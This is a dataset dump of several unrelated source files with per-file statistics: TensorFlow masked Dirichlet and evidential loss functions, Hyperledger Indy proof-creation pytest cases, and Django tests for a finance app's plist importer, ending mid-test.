# alpha = tf.exp(preds) + 1.0
S = tf.reduce_sum(alpha, axis=1, keepdims=True)
prob = tf.div(alpha, S)
loss = -labels * tf.log(prob)
loss = tf.reduce_sum(loss, axis=1)
# loss = tf.nn.softmax_cross_entropy_with_logits(logits=preds, labels=labels)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss *= mask
return tf.reduce_mean(loss)
def masked_cross_entropy_relu(preds, labels, mask):
"""Softmax cross-entropy loss with masking."""
alpha = preds + 1.0
S = tf.reduce_sum(alpha, axis=1, keepdims=True)
prob = tf.div(alpha, S)
loss = -labels * tf.log(prob)
loss = tf.reduce_sum(loss, axis=1)
# loss = tf.nn.softmax_cross_entropy_with_logits(logits=preds, labels=labels)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss *= mask
return tf.reduce_mean(loss)
def masked_cross_entropy_dirichlet(preds, labels, mask):
"""Softmax cross-entropy loss with masking."""
alpha = tf.exp(preds) + 1.0
S = tf.reduce_sum(alpha, axis=1, keepdims=True)
s_digmma = tf.digamma(S)
loss = labels * (s_digmma - tf.digamma(alpha))
loss = tf.reduce_sum(loss, axis=1)
# loss = tf.nn.softmax_cross_entropy_with_logits(logits=preds, labels=labels)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss *= mask
return tf.reduce_mean(loss)
def masked_square_error_edl(preds, labels, mask):
"""Softmax cross-entropy loss with masking."""
preds = preds + 1.0
S = tf.reduce_sum(preds, axis=1, keepdims=True)
prob = tf.div(preds, S)
loss = tf.square(prob - labels) + prob * (1 - prob) / (S + 1.0)
loss = tf.reduce_sum(loss, axis=1)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss *= mask
return tf.reduce_mean(loss)
def masked_square_error_dirichlet(preds, labels, mask):
"""Softmax cross-entropy loss with masking."""
alpha = tf.exp(preds) + 1.0
# alpha = tf.pow(1.5, preds) + 1.0
S = tf.reduce_sum(alpha, axis=1, keepdims=True)
prob = tf.div(alpha, S)
loss = tf.square(prob - labels) + prob * (1 - prob) / (S + 1.0)
loss = tf.reduce_sum(loss, axis=1)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss *= mask
return tf.reduce_mean(loss)
def masked_DPN(preds, labels, mask):
preds_alpha = tf.exp(preds) + 1.0
Dir_predict = tfd.Dirichlet(preds_alpha)
prior_alpha = labels*50 + 1.1
Dir_ori = tfd.Dirichlet(prior_alpha)
KL_term = Dir_predict.kl_divergence(Dir_ori)
# KL_term = Dir_ori.kl_divergence(Dir_predict)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss = KL_term * mask
return tf.reduce_mean(loss)
def masked_square_error_dirichlet2(preds, labels, mask):
"""Softmax cross-entropy loss with masking."""
alpha = preds + 2.0
# alpha = tf.pow(1.5, preds) + 1.0
S = tf.reduce_sum(alpha, axis=1, keepdims=True)
prob = tf.div(alpha, S)
loss = tf.square(prob - labels) + prob * (1 - prob) / (S + 1.0)
loss = tf.reduce_sum(loss, axis=1)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss *= mask
return tf.reduce_mean(loss)
def masked_kl_edl(preds, label, labels_num, mask):
K = labels_num
alpha = preds * (1.0 - label) + 1.0
beta = tf.constant(np.ones((1, K)), dtype=tf.float32)
S_alpha = tf.reduce_sum(alpha, axis=1, keep_dims=True)
S_beta = tf.reduce_sum(beta, axis=1, keep_dims=True)
lnB = tf.lgamma(S_alpha) - tf.reduce_sum(tf.lgamma(alpha), axis=1, keep_dims=True)
lnB_uni = tf.reduce_sum(tf.lgamma(beta), axis=1, keep_dims=True) - tf.lgamma(S_beta)
dg0 = tf.digamma(S_alpha)
dg1 = tf.digamma(alpha)
kl = tf.reduce_sum((alpha - beta) * (dg1 - dg0), axis=1, keep_dims=True) + lnB + lnB_uni
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss = kl * mask
return tf.reduce_mean(loss)
def masked_kl_teacher(preds, gcn_pred):
alpha = tf.exp(preds) + 1.0
S = tf.reduce_sum(alpha, axis=1, keep_dims=True)
prob = tf.div(alpha, S)
kl = prob * (tf.log(tf.div(prob, gcn_pred)))
return tf.reduce_mean(kl)
def masked_kl_prior(preds, prior_alpha, mask):
preds_alpha = tf.exp(preds) + 1.0
Dir_predict = tfd.Dirichlet(preds_alpha)
Dir_ori = tfd.Dirichlet(prior_alpha)
KL_term = Dir_predict.kl_divergence(Dir_ori)
# KL_term = Dir_ori.kl_divergence(Dir_predict)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
loss = KL_term * mask
return tf.reduce_mean(loss)
def kl_prior(preds, prior_alpha):
preds_alpha = tf.exp(preds) + 1.0
Dir_predict = tfd.Dirichlet(preds_alpha)
Dir_ori = tfd.Dirichlet(prior_alpha)
KL_term = Dir_predict.kl_divergence(Dir_ori)
# KL_term = Dir_ori.kl_divergence(Dir_predict)
loss = KL_term
return tf.reduce_mean(loss)
def masked_accuracy(preds, labels, mask):
"""Accuracy with masking."""
correct_prediction = tf.equal(tf.argmax(preds, 1), tf.argmax(labels, 1))
accuracy_all = tf.cast(correct_prediction, tf.float32)
mask = tf.cast(mask, dtype=tf.float32)
mask /= tf.reduce_mean(mask)
accuracy_all *= mask
return tf.reduce_mean(accuracy_all)
def masked_accuracy_numpy(preds, labels, mask):
"""Accuracy with masking."""
correct_prediction = np.equal(np.argmax(preds, 1), np.argmax(labels, 1))
accuracy_all = np.asarray(correct_prediction, np.float32)
mask = np.asarray(mask, dtype=np.float32)
mask /= np.mean(mask)
accuracy_all *= mask
return np.mean(accuracy_all)
def masked_accuracy_co(correct_prediction, mask):
"""Accuracy with masking."""
accuracy_all = np.array(correct_prediction, np.float32)
mask = np.asarray(mask, dtype=np.float32)
mask /= np.mean(mask)
accuracy_all *= mask
return np.mean(accuracy_all)
| 32.939086
| 92
| 0.670982
| 1,012
| 6,489
| 4.133399
| 0.08498
| 0.080325
| 0.06885
| 0.055941
| 0.84174
| 0.805881
| 0.764045
| 0.745876
| 0.718623
| 0.686828
| 0
| 0.021179
| 0.192325
| 6,489
| 196
| 93
| 33.107143
| 0.776951
| 0.125289
| 0
| 0.635037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.109489
| false
| 0
| 0.021898
| 0
| 0.240876
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8199d799e7f3fc1872018dbcde1e72b575d3c07b
| 36
|
py
|
Python
|
django_products/utils/__init__.py
|
sasriawesome/django_products
|
a945dbf983748ff558583695c66226d579bfa4a0
|
[
"MIT"
] | null | null | null |
django_products/utils/__init__.py
|
sasriawesome/django_products
|
a945dbf983748ff558583695c66226d579bfa4a0
|
[
"MIT"
] | 4
|
2021-03-19T01:39:36.000Z
|
2021-06-04T22:49:28.000Z
|
django_products/utils/__init__.py
|
sasriawesome/django_products
|
a945dbf983748ff558583695c66226d579bfa4a0
|
[
"MIT"
] | null | null | null |
from .slugify import unique_slugify
| 18
| 35
| 0.861111
| 5
| 36
| 6
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 36
| 1
| 36
| 36
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c4bc02fafcb7ba81e4cddeff64e864fed85a8270
| 3,716
|
py
|
Python
|
wrappers/python/tests/anoncreds/test_prover_create_proof.py
|
absltkaos/indy-sdk
|
bc14c5b514dc1c76ce62dd7f6bf804120bf69f5e
|
[
"Apache-2.0"
] | null | null | null |
wrappers/python/tests/anoncreds/test_prover_create_proof.py
|
absltkaos/indy-sdk
|
bc14c5b514dc1c76ce62dd7f6bf804120bf69f5e
|
[
"Apache-2.0"
] | null | null | null |
wrappers/python/tests/anoncreds/test_prover_create_proof.py
|
absltkaos/indy-sdk
|
bc14c5b514dc1c76ce62dd7f6bf804120bf69f5e
|
[
"Apache-2.0"
] | null | null | null |
import json
import pytest
from indy.anoncreds import prover_create_proof
from indy import error
@pytest.mark.asyncio
async def test_prover_create_proof_works(wallet_handle, prepopulated_wallet, gvt_schema_id, gvt_schema,
master_secret_id, proof_req, id_credential_1, issuer_1_gvt_cred_def_id):
credential_def_json, _, _, _, _ = prepopulated_wallet
requested_credentials = {
"self_attested_attributes": {},
"requested_attributes": {
"attr1_referent": {"cred_id": id_credential_1, "revealed": True}
},
"requested_predicates": {
"predicate1_referent": {"cred_id": id_credential_1}
}
}
schemas = {
gvt_schema_id: gvt_schema
}
credential_defs = {
issuer_1_gvt_cred_def_id: json.loads(credential_def_json)
}
await prover_create_proof(wallet_handle, json.dumps(proof_req), json.dumps(requested_credentials),
master_secret_id, json.dumps(schemas), json.dumps(credential_defs), "{}")
@pytest.mark.asyncio
async def test_prover_create_proof_works_for_using_not_satisfy_credential(wallet_handle, prepopulated_wallet,
gvt_schema_id, gvt_schema,
master_secret_id, id_credential_1,
issuer_1_gvt_cred_def_id):
credential_def_json, _, _, _, _ = prepopulated_wallet
proof_req = {
"nonce": "123432421212",
"name": "proof_req_1",
"version": "0.1",
"requested_attributes": {
"attr1_referent": {
"name": "some_attr"
}
},
"requested_predicates": {}
}
requested_credentials = {
"self_attested_attributes": {},
"requested_attributes": {
"attr1_referent": {"cred_id": id_credential_1, "revealed": True}
},
"requested_predicates": {
}
}
schemas = {
gvt_schema_id: gvt_schema
}
credential_defs = {
issuer_1_gvt_cred_def_id: json.loads(credential_def_json)
}
with pytest.raises(error.CommonInvalidStructure):
await prover_create_proof(wallet_handle, json.dumps(proof_req), json.dumps(requested_credentials),
master_secret_id, json.dumps(schemas), json.dumps(credential_defs), "{}")
@pytest.mark.asyncio
async def test_prover_create_proof_works_for_invalid_wallet_handle(wallet_handle, prepopulated_wallet, gvt_schema_id,
gvt_schema, master_secret_id, proof_req,
id_credential_1, issuer_1_gvt_cred_def_id):
credential_def_json, _, _, _, _ = prepopulated_wallet
requested_credentials = {
"self_attested_attributes": {},
"requested_attributes": {
"attr1_referent": {"cred_id": id_credential_1, "revealed": True}
},
"requested_predicates": {
"predicate1_referent": {"cred_id": id_credential_1}
}
}
schemas = {
gvt_schema_id: gvt_schema
}
credential_defs = {
issuer_1_gvt_cred_def_id: json.loads(credential_def_json)
}
invalid_wallet_handle = wallet_handle + 100
with pytest.raises(error.WalletInvalidHandle):
await prover_create_proof(invalid_wallet_handle, json.dumps(proof_req), json.dumps(requested_credentials),
master_secret_id, json.dumps(schemas), json.dumps(credential_defs), "{}")
| 34.728972
| 117
| 0.597686
| 370
| 3,716
| 5.486486
| 0.167568
| 0.053202
| 0.051232
| 0.041379
| 0.836946
| 0.812315
| 0.812315
| 0.812315
| 0.812315
| 0.812315
| 0
| 0.01492
| 0.314586
| 3,716
| 106
| 118
| 35.056604
| 0.782097
| 0
| 0
| 0.493976
| 0
| 0
| 0.120054
| 0.019381
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.048193
| 0
| 0.048193
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c4c910f754089e4dab392cb97849880e6e66bb37
| 42,621
|
py
|
Python
|
gsb/tests/test_import_plist.py
|
pfrancois/grisbi_django
|
4e27149522847c78ab9c0f0a06f0b1d371f7c205
|
[
"BSD-3-Clause"
] | null | null | null |
gsb/tests/test_import_plist.py
|
pfrancois/grisbi_django
|
4e27149522847c78ab9c0f0a06f0b1d371f7c205
|
[
"BSD-3-Clause"
] | null | null | null |
gsb/tests/test_import_plist.py
|
pfrancois/grisbi_django
|
4e27149522847c78ab9c0f0a06f0b1d371f7c205
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*
"""
test import
"""
from django.test.utils import override_settings
from django.conf import settings
import os.path
import datetime
import django.utils.timezone as tz
from gsb.io import lecture_plist
from gsb import models
from .test_imports_csv import Test_import_abstract
from gsb.io.lecture_plist import Lecture_plist_exception
from gsb.io.ecriture_plist_money_journal import Export_icompta_plist
import mock
from testfixtures import compare
import collections
class Test_element(Test_import_abstract):
def test_ope(self):
fich = os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist", 'Applications', 'Money Journal',
'log', "1402954705000.log")
ele = lecture_plist.collection_datas_decodes(fich)
self.compare(ele.datemaj, datetime.datetime(2014, 6, 16, 21, 38, 25, tzinfo=tz.utc))
el = ele.list_el[0]
self.compare(el.device, 'MyHpyVfqnK')
self.compare(el.action, 'c')
self.compare(el.sens_element, 'd')
self.compare(el.is_ope, True)
self.compare(el.is_cat, False)
self.compare(el.is_compte, False)
self.compare(el.is_budget, False)
self.compare(el.lastup, datetime.datetime(2014, 6, 16, 21, 38, 25, tzinfo=tz.utc))
self.compare(el.id, 66)
self.compare(el.cat, 1)
self.compare(el.automatique, False)
self.compare(el.date, datetime.date(2014, 6, 16))
self.compare(el.montant, -10.25)
self.compare(el.tiers, 'Ope standart')
self.compare(el.__str__(), "(66) le 16/06/2014 : -10.25 EUR tiers: Ope standart cpt: 1")
ele = lecture_plist.collection_datas_decodes(
os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist", 'Applications', 'Money Journal',
'log', "1403036267000.log"))
self.compare(ele.datemaj, datetime.datetime(2014, 6, 17, 20, 17, 47, tzinfo=tz.utc))
el = ele.list_el[0]
self.compare(el.device, 'MyHpyVfqnK')
self.compare(el.action, 'm')
self.compare(el.sens_element, 'd')
self.compare(el.is_ope, True)
self.compare(el.is_cat, False)
self.compare(el.is_compte, False)
self.compare(el.is_budget, False)
self.compare(el.lastup, datetime.datetime(2014, 6, 17, 20, 17, 47, 95470, tzinfo=tz.utc))
self.compare(el.id, 66)
self.compare(el.cat, 1)
self.compare(el.automatique, False)
self.compare(el.date, datetime.date(2014, 6, 16))
self.compare(el.montant, -55)
self.compare(el.tiers, 'Ope standart')
ele = lecture_plist.collection_datas_decodes(
os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist", 'Applications', 'Money Journal',
'log', "1403037219000.log"))
self.compare(ele.datemaj, datetime.datetime(2014, 6, 17, 20, 33, 39, tzinfo=tz.utc))
el = ele.list_el[0]
self.compare(el.device, 'MyHpyVfqnK')
self.compare(el.action, 'd')
self.compare(el.sens_element, 'd')
self.compare(el.is_ope, True)
self.compare(el.is_cat, False)
self.compare(el.is_compte, False)
self.compare(el.is_budget, False)
self.compare(el.lastup, datetime.datetime(2014, 6, 17, 20, 17, 47, 95470, tzinfo=tz.utc))
self.compare(el.id, 66)
self.compare(el.cat, 1)
self.compare(el.automatique, False)
self.compare(el.date, datetime.date(2014, 6, 16))
self.compare(el.montant, -55)
self.compare(el.tiers, 'Ope standart')
def test_compte(self):
el = lecture_plist.collection_datas_decodes(
os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist", 'Applications', 'Money Journal',
'log', "1403040634000.log")).list_el[0]
self.compare(el.device, 'MyHpyVfqnK')
self.compare(el.datemaj, datetime.datetime(2014, 6, 17, 21, 30, 34, tzinfo=tz.utc))
self.compare(el.action, 'c')
self.compare(el.is_ope, False)
self.compare(el.is_cat, False)
self.compare(el.is_compte, True)
self.compare(el.is_budget, False)
self.compare(el.lastup, datetime.datetime(2014, 6, 17, 21, 30, 34, tzinfo=tz.utc))
self.compare(el.id, 7)
self.compare(el.couleur, "#000000")
self.compare(el.nom, " ")
el = lecture_plist.collection_datas_decodes(
os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist", 'Applications', 'Money Journal',
'log', "1403040635000.log")).list_el[0]
self.compare(el.device, 'MyHpyVfqnK')
self.compare(el.datemaj, datetime.datetime(2014, 6, 17, 21, 30, 35, tzinfo=tz.utc))
self.compare(el.action, 'm')
self.compare(el.is_ope, False)
self.compare(el.is_cat, False)
self.compare(el.is_compte, True)
self.compare(el.is_budget, False)
self.compare(el.lastup, datetime.datetime(2014, 6, 17, 21, 30, 34, 88255, tzinfo=tz.utc))
self.compare(el.id, 7)
self.compare(el.couleur, '#000000')
self.compare(el.nom, "Ghh")
self.compare(el.__str__(), "(7) 'Ghh'")
el = lecture_plist.collection_datas_decodes(
os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist", 'Applications', 'Money Journal',
'log', "1403045414000.log")).list_el[0]
self.compare(el.device, 'MyHpyVfqnK')
self.compare(el.datemaj, datetime.datetime(2014, 6, 17, 22, 50, 14, tzinfo=tz.utc))
self.compare(el.action, 'd')
self.compare(el.is_ope, False)
self.compare(el.is_cat, False)
self.compare(el.is_compte, True)
self.compare(el.is_budget, False)
self.compare(el.lastup, datetime.datetime(2014, 6, 17, 21, 30, 34, 88255, tzinfo=tz.utc))
self.compare(el.id, 7)
self.compare(el.couleur, "#000000")
self.compare(el.nom, "Ghh")
def test_element_cat(self):
el = lecture_plist.collection_datas_decodes(
os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist", 'Applications', 'Money Journal',
'log', "1403049014000.log")).list_el[0]
self.compare(el.device, 'MyHpyVfqnK')
self.compare(el.datemaj, datetime.datetime(2014, 6, 17, 23, 50, 14, tzinfo=tz.utc))
self.compare(el.action, 'c')
self.compare(el.is_ope, False)
self.compare(el.is_cat, True)
self.compare(el.is_compte, False)
self.compare(el.is_budget, False)
self.compare(el.lastup, datetime.datetime(2014, 6, 17, 23, 50, 14, tzinfo=tz.utc))
self.compare(el.id, 16)
self.compare(el.couleur, '#000000')
self.compare(el.nom, " ")
self.compare(el.type_cat, "d")
el = lecture_plist.collection_datas_decodes(
os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist", 'Applications', 'Money Journal',
'log', "1403049014010.log")).list_el[0]
self.compare(el.device, 'MyHpyVfqnK')
self.compare(el.datemaj, datetime.datetime(2014, 6, 17, 23, 50, 14, 10000, tzinfo=tz.utc))
self.compare(el.action, 'm')
self.compare(el.is_ope, False)
self.compare(el.is_cat, True)
self.compare(el.is_compte, False)
self.compare(el.is_budget, False)
self.compare(el.lastup, datetime.datetime(2014, 6, 17, 23, 50, 14, 10000, tzinfo=tz.utc))
self.compare(el.id, 16)
self.compare(el.couleur, '#000000')
self.compare(el.nom, "Cat aded")
self.compare(el.type_cat, "d")
self.compare(el.__str__(), "(16) 'Cat aded' type:d")
el = lecture_plist.collection_datas_decodes(
os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist", 'Applications', 'Money Journal',
'log', "1403049014020.log")).list_el[0]
self.compare(el.device, 'MyHpyVfqnK')
self.compare(el.datemaj, datetime.datetime(2014, 6, 17, 23, 50, 14, 20000, tzinfo=tz.utc))
self.compare(el.action, 'd')
self.compare(el.is_ope, False)
self.compare(el.is_cat, True)
self.compare(el.is_compte, False)
self.compare(el.is_budget, False)
self.compare(el.lastup, datetime.datetime(2014, 6, 17, 23, 50, 14, 10000, tzinfo=tz.utc))
self.compare(el.id, 16)
self.compare(el.couleur, '#000000')
self.compare(el.nom, "Cat aded")
self.compare(el.type_cat, "d")
class Test_check(Test_import_abstract):
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist"))
def test_element_check(self):
self.compare(lecture_plist.check(), True) # TODO improve it
class Test_import_item_first_part(Test_import_abstract):
def setUp(self):
self.request = self.request_get('outils')
self.lastmaj = datetime.datetime(2014, 6, 15, 00, 25, 14, tzinfo=tz.utc)
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist"))
def test_element_import(self):
"""normalement il n'y a aucune operation"""
self.lastmaj = datetime.datetime(2014, 6, 20, 00, 25, 14, tzinfo=tz.utc)
self.compare(sorted(lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request).most_common()), [('deja', 9)])
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist"))
def test_element_import2(self):
"""avec crea, modif et del de chaque type"""
self.compare(sorted(lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request).most_common()),
[('categorie', 0), ('compte', 0), ('ope', 0)])
@override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_2"))
def test_element_import3(self):
"""avec crea, modif de cat et compte"""
self.compare(sorted(lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request).most_common()),
[('categorie', 1), ('compte', 1)])
self.assertmessagecontains(self.request, "catégorie (16) 'Cat aded' type:d créée")
self.assertmessagecontains(self.request, "compte (7) 'Ghh' créé")
class Test_item_modif_effectives_cote_cat(Test_import_abstract):
    """Plist-import tests for effective changes on the category (Cat) side.

    Each test points DIR_DROPBOX at a dedicated fixture directory and checks
    either the importer's user messages or the Lecture_plist_exception raised.
    """

    def setUp(self):
        # Fake GET request used by the importer to post user messages.
        self.request = self.request_get('outils')
        # Only plist entries newer than this timestamp are processed.
        self.lastmaj = datetime.datetime(2014, 6, 15, 00, 25, 14, tzinfo=tz.utc)
        # Category pk 16 referenced by the fixture plists.
        self.cat = models.Cat.objects.create(pk=16, nom="Cat aded", type="d", couleur=0)

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_3"))
    def test_element_import4(self):
        """Standard modification of an existing category and account."""
        self.cpt = models.Compte.objects.create(pk=7, nom='hjhjhkh', couleur='#FFFFFF')
        # Reset the category to pre-import values so the import modifies it.
        self.cat.nom = "Cat initial"
        self.cat.type = 'r'
        self.cat.couleur = '#FFFFFF'
        self.cat.save()
        self.compare(sorted(lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request).most_common()),
                     [('categorie', 1), ('compte', 1)])
        # Modification messages list every changed field (old => new).
        self.assertmessagecontains(self.request,
                                   "catégorie (16) 'Cat aded' type:d modifiée comme ca: nom: Cat initial => Cat aded, couleur: #FFFFFF => #000000, type: r => d")
        self.assertmessagecontains(self.request,
                                   "compte (7) 'Ghh' modifié comme ca: nom: hjhjhkh => Ghh, couleur: #FFFFFF => #000000")
        # The database rows must now hold the imported values.
        cat = models.Cat.objects.get(pk=16)
        self.compare(cat.nom, 'Cat aded')
        self.compare(cat.couleur, '#000000')
        self.compare(cat.type, 'd')
        obj = models.Compte.objects.get(pk=7)
        self.compare(obj.nom, 'Ghh')

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_5"))
    def test_element_import6(self):
        """Creating a category that already exists must raise."""
        with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
            lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.compare(exception_context_manager.exception.args,
                     ("attention la catégorie (16) 'Cat aded' type:d existe déja alors qu'on demande de la créer", ))

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_6"))
    def test_element_import7(self):
        """Modifying a category that was never created must raise."""
        with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
            lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.compare(exception_context_manager.exception.args, (
            "attention la catégorie (1111) 'Cat aded' type:d n'existe pas alors qu'on demande de la modifier", ))

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_8"))
    @override_settings(ID_CAT_OST=2)
    def test_element_import8(self):
        """Modifying the default (OST) category only emits a refusal message."""
        models.Cat.objects.create(pk=2, nom="Cat ost", type="r", couleur='#FFFFFF')
        lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.assertmessagecontains(self.request, "impossible de modifier la cat (2) 'Cat aded' type:d")

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_9"))
    def test_element_import9(self):
        """Modifying a category whose name already matches: only couleur/type change."""
        self.cat.type = 'r'
        self.cat.couleur = '#FFFFFF'
        self.cat.save()
        lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.assertmessagecontains(self.request,
                                   "catégorie (16) 'Cat aded' type:d modifiée comme ca: couleur: #FFFFFF => #000000, type: r => d")

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_10"))
    def test_element_import10(self):
        """Deleting a category that does not exist must raise."""
        self.cat.delete()
        with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
            lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.compare(exception_context_manager.exception.args, (
            "attention la catégorie (16) 'Cat aded' type:d n'existe pas alors qu'on demande de la supprimer", ))

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_11"))
    def test_element_import11(self):
        """Deleting a category still referenced by an operation must raise."""
        # Build a minimal operation attached to the category so it cannot
        # be removed.
        self.cpt = models.Compte.objects.create(pk=7, nom='Ghh', couleur=0)
        self.moyen = models.Moyen.objects.create(id=settings.MD_CREDIT, nom="dd", type="r")
        self.ope = models.Ope.objects.create(compte=self.cpt, date=datetime.date(2014, 6, 15), montant=250, tiers=models.Tiers.objects.get_or_create(nom="tiers", defaults={'nom': "tiers"})[0], cat=self.cat, moyen=self.moyen)
        with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
            lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.compare(("catégorie non supprimable (16) 'Cat aded' type:d car elle a des opérations rattachées", ),
                     exception_context_manager.exception.args)

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_12"))
    @override_settings(ID_CAT_OST=2)
    def test_element_import12(self):
        """Deleting the default (OST) category must raise."""
        models.Cat.objects.create(pk=2, nom="Cat ost", type="r", couleur='#FFFFFF')
        with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
            lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.compare(("impossible de supprimer la catégorie (2)", ), exception_context_manager.exception.args)

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_12_1"))
    def test_element_import12_1(self):
        """Successful deletion of a category."""
        lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.assertmessagecontains(self.request, "catégorie (Cat aded) #16 supprimée")
class Test_import_item_modif_effectives_cote_compte(Test_import_abstract):
    """Plist-import tests for effective changes on the account (Compte) side."""

    def setUp(self):
        # Fake GET request used by the importer to post user messages.
        self.request = self.request_get('outils')
        # Only plist entries newer than this timestamp are processed.
        self.lastmaj = datetime.datetime(2014, 6, 15, 00, 25, 14, tzinfo=tz.utc)
        # Account pk 7 referenced by the fixture plists.
        self.cpt = models.Compte.objects.create(pk=7, nom='hjhjhkh', couleur=0)

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_4"))
    def test_element_import5(self):
        """Creating an account that already exists must raise."""
        with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
            lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.compare(exception_context_manager.exception.args,
                     ("attention le compte (7) 'Ghh' existe déja alors qu'on demande de le créer", ))

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_13"))
    def test_element_import13(self):
        """Modifying an account whose name already matches: only couleur changes."""
        self.cpt.couleur = "#FFFFFF"
        self.cpt.save()
        lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.assertmessagecontains(self.request, "compte (7) 'hjhjhkh' modifié comme ca: couleur: #FFFFFF => #000000")

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_14"))
    def test_element_import14(self):
        """Deleting an account that does not exist must raise."""
        self.cpt.delete()
        with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
            lecture_plist.import_items(lastmaj=self.lastmaj, request=self.request)
        self.compare(exception_context_manager.exception.args, (
            "attention le compte 7 n'existe pas pour ce nom (hjhjhkh) alors qu'on demande de le supprimer", ))

    @override_settings(DIR_DROPBOX=os.path.join(settings.PROJECT_PATH, "gsb", "test_files", "import_plist_15"))
    def test_element_import15(self):
        """Deleting an account still referenced by an operation must raise."""
        # Minimal operation attached to the account so it cannot be removed.
        cat = models.Cat.objects.create(pk=16, nom="Cat aded", type="r", couleur='#FFFFFF')
        moyen = models.Moyen.objects.create(id=settings.MD_CREDIT, nom="dd", type="r")
        models.Ope.objects.create(compte=self.cpt, date=datetime.date(2014, 6, 15), montant=250,
                                  tiers=models.Tiers.objects.get_or_create(nom="tiers", defaults={'nom': "tiers"})[0],
                                  cat=cat, moyen=moyen)
        with self.assertRaises(Lecture_plist_exception) as exception_context_manager:
